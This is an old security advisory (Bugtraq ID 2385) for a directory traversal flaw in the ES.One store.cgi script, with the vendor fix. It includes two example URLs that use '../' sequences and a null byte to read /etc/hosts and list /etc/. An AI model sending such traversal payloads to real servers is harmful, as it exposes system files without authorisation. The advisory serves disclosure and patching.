BID:2385

Thinking Arts ES.One Directory Traversal Vulnerability

Info

Thinking Arts ES.One Directory Traversal Vulnerability

Bugtraq ID:	2385
Class:	Input Validation Error
CVE:	CVE-2001-0305
Remote:	Yes
Local:	Yes
Published:	Feb 16 2001 12:00AM
Updated:	Jul 11 2009 04:46AM
Credit:	Discovered and posted to Bugtraq by <[email protected]> on Feb 16, 2001.
Vulnerable:	Thinking Arts ES.One 1.0 - Apache Apache 1.3.9 - Apache Apache 1.3.9 - Redhat Linux 7.0

Not Vulnerable:	Thinking Arts ES.One 2.2 - Apache Apache 1.3.9 - Apache Apache 1.3.9 - Redhat Linux 7.0

Discussion

Thinking Arts ES.One Directory Traversal Vulnerability

It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory.

Exploit / POC

Thinking Arts ES.One Directory Traversal Vulnerability

The following example has been provided by <[email protected]>:

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory.

Solution / Fix

Thinking Arts ES.One Directory Traversal Vulnerability

Solution:
Thinking Arts has addressed this in ES.One version 2.2. To obtain the latest version, users must contact the vendor.

References

Thinking Arts ES.One Directory Traversal Vulnerability

References:

ES.One Product Homepage (Thinking Arts)
Incident & Fault Reports (Thinking Arts)